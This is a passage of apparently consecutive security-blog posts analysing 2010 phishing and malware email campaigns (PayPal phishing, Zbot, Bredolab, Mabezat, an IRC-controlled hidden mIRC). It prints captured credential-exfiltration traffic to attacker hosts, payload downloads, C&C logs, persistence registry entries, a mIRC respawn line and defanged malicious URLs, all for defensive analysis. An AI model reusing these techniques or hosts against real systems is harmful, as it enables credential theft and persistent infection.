Typical message content, but they usually give you a (fraudulent) link to follow. Not this time, they attach an HTML file which will open in any browser. I opened the file in a safe environment, all looks very convincing.

Now, not only would PayPal never ask you to reactivate your account in this manner, they would never ask for your credit card & personal details.

When you click the Submit button it will send all the details you entered to this script.

hxxp://202.181.105.217/~info/AccountVerification/cf.php

Which displays this output.

So in conclusion, if you ever are worried your PayPal account has been accessed by a third party and needs reactivating, phone them.

Below there is a list of the subjects of the emails:

Thank you for setting the order No.937453
Thank you for setting the order No.038803
Thank you for setting the order No.364582
Thank you for setting the order No.063272
Thank you for setting the order No.204523
Outlook Setup Notification
Please confirm your order!
UPS Tracking #8045421962
Account notification
I hope the patch works!

Senders:

from 196.210.42.73 by gatekeeper.rkeng.com
from 190.20.11.225 by rotor.com.mx2.emailblockade.rcimx.net
from 88.117.81.132 by mail.rotwand.com
from 186.28.222.233 by rgbsys.com
from 78.101.216.30 by rbdc.com.vcitynet.com
from 95.105.26.105 by razzanirealty.com.s5a2.psmtp.com
from 188.58.63.86 by mx1.emailsrvr.com
from 41.153.194.141 by mail.rossof.com
from 83.44.96.144 by mx227.front02.scannet.dk
from 90.192.230.101 by alt1.aspmx.l.google.com
from 203.241.244.249 by mail.rowanrentals.com
from 188.186.156.237 by es3mta-2.messageone.com
from 178.93.116.2 by mailin.rzone.de
from 115.117.208.210 by ridgewells.com.s7b1.psmtp.com

The mere fact that an email message that promotes the postcards and redirects the user to download an executable file, it is very suspicious, and in fact the file is infected with malware:

File name: cartoline.exe
File size: 601600 bytes
MD5 hash: 92a9346604726a7d26a51d3509f806e4
SHA1 hash: 8d6817f4d365419b1cd2ac07c8035798d94d0d6e
Detection rate: 9 on 20 (45%)
Status: INFECTED

a-squared 15/05/2010 5.0.0.7 Trojan-Downloader.Win32.Banload!IK
AVG 271.1.1/2877 9.0.0.725 Downloader.Agent2.WWA
Avira AntiVir 7.10.7.111 7.6.0.59 TR/Spy.Banker.Gen
Comodo 3468 3.13.579 Heur.Pck.Enigma
F-PROT6 20100515 4.5.1.85 W32/Heuristic-DL1!Eldorado
G-Data 21.171 2.0.7309.847 Trojan-Downloader.Win32.Agent.dqkq A
Ikarus T3 16/05/2010 1.1.84.0 Trojan-Downloader.Win32.Banload
Kaspersky 16/05/2010 9.0.0.736 Trojan-Downloader.Win32.Agent.dqkq
TrendMicro 171 9.120-1004 Mal_Banker

Here we can see the activity of the malware by analyzing the log file generated by Hijack Hunter:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15

[+] Running processes
 
C:\windows\wain.exe (2060288 bytes) (Unknown) (5/14/2010 7:54:05 PM) (--A-) (746adf360cb07eb058d1a0fcf1a19603)
 
[+] Registry startups
 
Value: Win32
Data: C:\windows\wain.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
 
[+] Files created/modified 15 days ago
 
C:\WINDOWS\nvsvs.exe (1033216 bytes) (Unknown) (5/14/2010 7:53:34 PM) (--A-) (613feb50b850e0695c47b81a383caf28) (Created)
C:\WINDOWS\wain.exe (2060288 bytes) (Unknown) (5/14/2010 7:54:05 PM) (--A-) (746adf360cb07eb058d1a0fcf1a19603) (Created)
C:\WINDOWS\wilps.exe (806400 bytes) (Unknown) (5/14/2010 7:55:16 PM) (--A-) (9e78023032221f2955e95d7394531245) (Created)

Network traffic:

1
2
3
4
5
6
7
8

POST /images/wab.php HTTP/1.0
Host: indiegear(dot)org
User-Agent: Mozilla/3.0 (compatible; Indy Library)
----------051410195548264
Content-Disposition: form-data; name="texto"
POP3(Identi):Pass(........L.......); 
-----------------------------
----------051410195548264--

From the traffic above we can see the malware is a passwords stealer and it sent data related to a POP3 account to the malicious host through the POST query to /images/wab.php.

1
2
3
4
5
6

GET /images/heade.gif HTTP/1.1
User-Agent: nvsvs.exe
Host: junipero(dot)com(dot)br
 
GET /IT/contador.php HTTP/1.1
Host: www.richardmata(dot)xpg(dot)com(dot)br

From the last GET query, we can see this:

Estamos com 372 visitas

It should be the total number of the users that have clicked in the malicious link present in the email and that have been infected by the malware.

1
2
3

GET /midia/list.gif HTTP/1.1
User-Agent: nvsvs.exe
Host: mariogesteiracosta(dot)com(dot)br

As always pay attenction when reading email, even if you think the email of the sender can be legit. Remember to never click in unknown links and always analyze the html code of the email to understand better where the link can redirect.

Email headers:

Sender: Cartoline.Net
Subject: C’e’ una Cartolina per te!
Received: from naut2004.kultunaut.dk (1903ds1-by.1.fullrate.dk)
IP Address: 90.184.81.220

Malicious link present in the message:

1
2
3
4
5
6

GET /~nikolai/BuonaPasqua.gif.exe HTTP/1.0
Host: 194.79.14.129
Pragma: no-cache
 
HTTP/1.1 200 OK
Date: Fri, 19 Mar 2010 22:40:41 GMT

When the file is executed, it opens an image file named xmas.jpg:

At the same time we notice that a program named spoolsv.exe is trying to connect to a remote server and we get an alert from the Windows Firewall:

Network traffic:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34

Protocol          : TCP
Remote Address    : 200.174.131.226
Remote Port       : 6667
 
NICK kijo
NOTICE AUTH :*** Looking up your hostname
NOTICE AUTH :*** Checking Ident
 
USER henryett "" "200.174.131.226" :pingo
NOTICE AUTH :*** No ident response
 
SILENCE +*!*@*
MODE kijo +iwx
NOTICE AUTH :*** Couldn't look up your hostname
PING :74643361
:my.server.name 451 kijo SILENCE :Register first.
:my.server.name 451 kijo MODE :Register first.
:my.server.name 001 kijo :Welcome to the Internet Relay Network icyg
:my.server.name 002 kijo :Your host is my.server.name, running version beware1.5.7
:my.server.name 003 kijo :This server was created Tue Jul 13 2004 at 20:36:17 GMT
:my.server.name 251 kijo :There are 1 users and 9 invisible on 1 servers
:my.server.name 252 kijo 1 :operator(s) online
:my.server.name 254 kijo 2 :channels formed
:my.server.name 255 kijo :I have 10 clients and 0 servers
:my.server.name NOTICE kijo :Highest connection count: 14 (14 clients)
:my.server.name 422 kijo :MOTD File is missing
 
:kijo!~bijaikos@XXX.XXX.XXX.XXX JOIN :#bran
:my.server.name 353 kijo = #bran :kijo @Bran @sullyc @batmanv @bassemd @eviaq @daiseyx
:my.server.name 366 kijo #bran :End of /NAMES list.
 
:Bran!~lonut@Bran.ro MODE #bran +o kijo 
:Bran!~lonut@Bran.ro PRIVMSG #bran :.msg giova a
:Bran!~lonut@Bran.ro PRIVMSG #bran :.msg giovy a

Details on oper “Bran”:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18

WHOIS Bran
:my.server.name 311 kijo Bran ~lonut Bran.ro * :B
:my.server.name 319 kijo Bran :#bran
:my.server.name 312 kijo Bran my.server.name :I'm too lazy to edit ircd.conf
:my.server.name 313 kijo Bran :is an IRC Operator
:my.server.name 317 kijo Bran 622 1269018316 :seconds idle, signon time
:my.server.name 318 kijo Bran :End of /WHOIS list.
 
WHOWAS Bran
:my.server.name 314 kijo Bran ~lonut bran.ro * :B
:my.server.name 312 kijo Bran my.server.name :Fri Mar 19 15:03:19 2010
:my.server.name 314 kijo Bran ~lonut Bran.ro * :B
:my.server.name 312 kijo Bran my.server.name :Fri Mar 19 14:04:23 2010
:my.server.name 314 kijo Bran ~lonut Bran.ro * :B
:my.server.name 312 kijo Bran my.server.name :Fri Mar 19 13:57:47 2010
:my.server.name 314 kijo Bran ~lonut Bran.ro * :B
:my.server.name 312 kijo Bran my.server.name :Fri Mar 19 11:43:16 2010
:my.server.name 369 kijo Bran :End of WHOWAS

The file spoolsv.exe looks like to be the executable of the legit application named mIRC but we notice something strange… why the icon tray has no icon ? After checking the files we notice that the skids have replaced the file mirc.ico with an empty icon and it become “invisible” in the icon tray:

Now let’s open the hidden mIRC and see how does it looks:

It is the legit version of mIRC, but a bit hijacked, we can see all the backgrounds of the chats are white to obfuscate the content, a simple change of the colors and here we go:

We can get useful info from the hidden files that are in the same folder where is the hidden spoolsv.exe, from the file users.ini we can see allowed users to chat with the hidden mIRC that is started in the infected user:

We can also see two files, respectively a.reg used to add the needed registry keys, for startup the hidden mIRC at every reboot of the system, in the windows registry and the file run.bat that is used to start the file a.reg and the hidden mIRC (spoolsv.exe):

All files created by the malicious file BuonaPasqua.gif.exe:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17

C:\WINDOWS\Temp\spoolsv
C:\WINDOWS\Temp\spoolsv\a.reg
C:\WINDOWS\Temp\spoolsv\aliases.ini
C:\WINDOWS\Temp\spoolsv\control.ini
C:\WINDOWS\Temp\spoolsv\mirc.ico
C:\WINDOWS\Temp\spoolsv\mirc.ini
C:\WINDOWS\Temp\spoolsv\remote.ini
C:\WINDOWS\Temp\spoolsv\run.bat
C:\WINDOWS\Temp\spoolsv\servers.ini
C:\WINDOWS\Temp\spoolsv\spoolsv.exe
C:\WINDOWS\Temp\spoolsv\users.ini
C:\WINDOWS\Temp\spoolsv\s.mrc
C:\WINDOWS\Temp\spoolsv\com.mrc
C:\WINDOWS\Temp\spoolsv\xmas.jpg
C:\WINDOWS\Temp\spoolsv\logs
C:\WINDOWS\Temp\spoolsv\sounds
C:\WINDOWS\Temp\spoolsv\download

From the script file com.mrc we can see also a sort of “restart on exit” code that make sure when mIRC is closed, the process spoolsv.exe is started again:

1

on *:exit: { /run $mircexe | halt }

To remove this kind of threat from an infected system we can use a simple script that we will execute with our free software Threat Killer:

1
2
3

[DELETE FOLDERS RECURSIVE]
C:\WINDOWS\Temp\spoolsv\
[/END]

Output:

Some of the subjects of the emails are:

MBA new vision
Web designer vacancy
New work for you
You are assumed!
Welcome to your new work
We are hiring you

Headers of the emails:

marwan.libyanspider9.com (8a.69.344a.static.theplanet.com [74.52.105.138])
[41.254.0.170] (helo=akram8eb165562) by marwan.libyanspider9.com

All the messages of these spam emails try to do social engineering against the readers of the emails, by writing that the file contains no viruses and that it is needed winrar to decompress it:

The original file name is JobDetails.rar and compressed by WinRAR no virus found. Use WinRAR to decompress the file.

The extracted file is detected by all Antivirus Software:

Report date: 2010-02-25 00:41:43 (GMT 1)
File name: Readme.doc_.exe
File size: 110311 bytes
MD5 Hash: fff3d04deea479e4b20326e2f064c5d9
SHA1 Hash: 6706d9d75527ccb81f987ed695cce8e496a57531
Detection rate: 19 on 19 (100% )
Status: INFECTED

 

a-squared – Worm.Win32.Mabezat!IK
Avira AntiVir – Worm/Mabezat.b
Avast – Win32:Mabezat-AM [Trj]
AVG – Worm/Generic.EDT
BitDefender – Worm.Generic.65976
ClamAV – W32.Mabezat-2
Comodo – Worm.Win32.Mabezat.b
Dr.Web – Win32.HLLW.Tazebama
Ewido – Worm.Mabezat.b
F-PROT6 – W32/Worm!a69a
Ikarus T3 – Worm.Win32.Mabezat
Kaspersky – Worm.Win32.Mabezat.b
McAfee – W32/Mabezat virus
NOD32 – Win32/Mabezat.A virus
Panda – W32/Mabezat.C.worm
Solo – Worm/Win32.Mabezat.B
TrendMicro – PE_MABEZAT.B-O
VBA32 – Worm.Win32.Mabezat.b
VirusBuster – Worm.Mabezat.A

In this article you can find an analysis of the malware activity:
PROHIBITED_MATRIMONY.rar Spam = Worm.Win32.Mabezat

The file extracted from the ZIP archive is named ecard.exe:

Report date: 7.2.2010 at 13.08.05 (GMT 1)
File name: ecard.exe
File size: 94208 bytes
MD5 Hash: 859b6786b551c1c7672f361447c0f481
SHA1 Hash: 3533D767771605BD647FFA9096A63F39B6C12A45
Detection rate: 19 on 19
Status: INFECTED

 

a-squared – Trojan-Spy.Win32.Zbot!IK
Avira AntiVir – TR/Crypt.ZPACK.Gen
Avast – Win32:Zbot-LVW [Trj]
AVG – Win32/Cryptor
BitDefender – Backdoor.Bot.104112
ClamAV – Trojan.Spy.Zbot-40
Comodo – TrojWare.Win32.TrojanSpy.Zbot.Gen
Dr.Web – Trojan.PWS.Panda.122
F-PROT6 – W32/Trojan3.BCN
G-Data – Trojan-Spy.Win32.Zbot.zur A
Ikarus T3 – Trojan-Spy.Win32.Zbot
Kaspersky – Trojan-Spy.Win32.Zbot.zur
McAfee – PWS-Zbot trojan
NOD32 – Win32/Spy.Zbot.JF
Panda – Trj/Sinowal.WLU
Solo Antivirus – Trojan.Spy.Win32.Zbot.Zur
Sophos – Troj/Agent-KQH
VBA32 – Trojan-Spy.Win32.Zbot.zur
VirusBuster – TrojanSpy.Zbot.KZW

When the program is executed, it creates the following files:

1

C:\WINDOWS\system32\sdra64.exe

The program injects code into the system process named winlogon.exe and it creates the following registry entries:

1
2

HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit:
C:\WINDOWS\system32\userinit.exe,C:\WINDOWS\system32\sdra64.exe,

The subjects of the malicious emails are always the same:

You have received an eCard
You have received a postcard
You’ve received an eCard
You’ve received a postcard

This is the message of the emails:

Good day.
You have received an eCard

 

To pick up your eCard, open attached file

 

Your card will be aviailable for pick-up beginning for the next 30 days.
Please be sure to view your eCard before the days are up!

 

We hope you enjoy you eCard.

 

Thank You!

Headers of the emails:

Received: from KKHTNFB (unknown [210.183.62.81])
Received: from 210.183.62.81 by mail.sasun.net

Pay always attention when you open emails in your inbox, if you receive a similar email and the attached file is a ZIP archive named ecard.zip or postcard.zip, ignore the email.

The file extracted from the .zip archive is an executable file:

Report date: 2.2.2010 at 20.58.00 (GMT 1)
File name: DHL_Label_1ae0a.exe
File size: 30208 bytes
MD5 hash: 6bbf1c34b753a46bc000000b74046a97
SHA1 hash: 10FDAD2FDCB2BA2EDC3ABD48D1DB72D33AB60180
Detection rate: 18 on 23 (78.26%)

 

a-squared 02/02/2010 4.5.0.8 Trojan.Win32.Bredolab!IK
Avira AntiVir 7.10.3.139 7.6.0.59 DR/Delphi.Gen
Avast 100201-1 4.8.1229 Win32:Bredolab-BD [Trj]
AVG 270.14.132/2611 9.0.0.725 Generic_r.CV
BitDefender 02/02/2010 7.0.0.2555 Trojan.CryptRedol.Gen.5
ClamAV 29/01/2010 0.95.1 Trojan.Agent-130266
Comodo 3468 3.13.579 TrojWare.Win32.Trojan.Agent.Gen
Dr.Web 02/02/2010 5.0 Trojan.Botnetlog.11
F-PROT6 20100201 4.5.1.85 W32/SuspPack.BG.gen!Eldorado
G-Data 19.9309 2.0.7309.847 Packed.Win32.Krap.aj A
Ikarus T3 29/01/2010 1001074 Trojan.Win32.Bredolab
Kaspersky 02/02/2010 8.0.0.357 Packed.Win32.Krap.aj
NOD32 v3 4829 3.0.677 Win32/Kryptik.BIT
Norman 2009/11/03 5.92.08 New unknown virus W32/Obfuscated.D!genr
Solo Antivirus 02/02/2010 8.0 Backdoor.Bredolab.Bki
Sophos 02/02/2010 4.32.0 Mal/FakeDouf-B
VBA32 02/02/2010 3.12.0.300 Backdoor.Win32.Lyla.2
VirusBuster 10.119.29 1.4.3 Trojan.Fraudload.Gen!Pac.5

When the file is executed, it creates the following files:

1
2
3
4
5
6

%Programs%\Startup\isqsys32.exe
C:\WINDOWS\okrehint.dll
C:\WINDOWS\system32\kmopare.dll
C:\WINDOWS\system32\sys.dat
C:\WINDOWS\system32\wbem\proquota.exe
C:\WINDOWS\Temp\wpv244543543509.exe

The file named isqsys32.exe has +S (System) attributes and it injects code into another system process named svchost.exe, it is placed in the startup folder so that anytime you start Windows also the malicious file is executed. Since the file is copied in the startup folder it is not added any registry key related to its startup in the registry. The two .DLL files are installed as Browser Helper Objects and are used to control the web browser Internet Explorer.

If you have received similar emails make sure to analyze the attached file, check also the extension of the attached file and the extension of the extracted file.
In case it is a virus, delete the email immediately!

Below there are some examples of subjects used in the scam emails:

Subject: Important Update
Subject: Security Check
Subject: Update your profile
Subject: Urgent Notice
Subject: Profile update
Subject: Security Warning
Subject: Update your Account
Subject: Update your Password

While I was checking the headers of the emails, I noticed that most of the IP addresses of the senders come from Chinese (.CN) domains:

mail.bnu.edu.cn (mail.bnu.edu.cn [219.142.99.2])
58.185.112.164 (HELO user) (58.185.112.164) by 219.142.99.2
mailqd.cmr.com.cn (unknown [211.100.42.132])
User ([212.62.45.71]) by mailqd.cmr.com.cn
mail0.shift.edu.cn (unknown [61.152.219.51])
User ([58.185.112.164]) by mail0.shift.edu.cn
mail.smu.ac.kr (smu.ac.kr [203.237.168.13])
User ([58.185.112.164]) (authenticated (0 bits)) by mail.smu.ac.kr
idrgroup-nx0i3d.idrgroup.local (servera210.opencom.com [121.78.88.210])
User ([58.185.112.164]) by idrgroup-nx0i3d.idrgroup.local
mail.fudan.edu.cn (unknown [61.129.42.10])
User ([212.62.45.71]) by mail.fudan.edu.cn

Some of the malicious links used for phishing attacks are the following:

1
2
3
4
5

hxxp://zoahaza.isfreeweb.com/tt/style/setup/image/m2u.htm
hxxp://www.dobongn.kr/gnuboard4/bbs/m2u.htm
hxxp://central-groove.co.uk/images/M_images/www.maybank2u.com.my/m2u.htm
hxxp://zoahaza.isfreeweb.com/tt/components/m2u.htm
hxxp://womabkr.com.tw/Ch/img/main.htm

Not all the links are still active and fortunately there are also links that are detected and blocked by Mozilla Firefox but keep in mind that there are always links that are not blocked or that are not detected by any antispam filter!

Remember always to NOT insert sensitive data in unknown websites and to never click in links contained in unknown emails. When you receive this kind of emails, example from your Bank, and you are requested to insert sensitive data make sure to give a call to your bank before insert any kind of data in the suspicious website.

In recent days we have registered more than 800 spam messages that mask the links with the underscore character to bypass some antispam filters. The spam messages contained in most promotions of pharmaceutical products and in some cases even false software products.

The malicious URL is generally composed by 2 or 3 letters and by 1 or 2 numbers, the TLDs that are mostly used are .com and .net. In the following lines there is an example of a spammed url:

1
2
3

www_se57_net
www_se58_net
www_se59_net

Some IP addresses of those who have sent the spam emails are also present in the spam messages that were analyzed in the previous article, we assumes that this new spam campaign has been launched from the same botnet that launched the spam campaign using the space character to mask the malicious links

The malicious URL is generally composed by 2 or 3 letters and by 1 or 2 numbers, the TLDs that are mostly used are .com and .net. In the following lines there is an example of a spammed url:

1
2

www. via86. com
www. via87. com

The IP addresses that send these emails are mostly ADSL, this suggests to be a spam campaign that is led by botnets that use the infected computers as a resource to send emails and therefore avoid some antispam filters that control the IP Address of the sender.

As the IP Addresses are mostly ADSL, is very hard for the antispam filters to detect the malicious IP Address, as is very common that an ADSL user can restart the router/modem and having a new IP Address it can avoid such filters.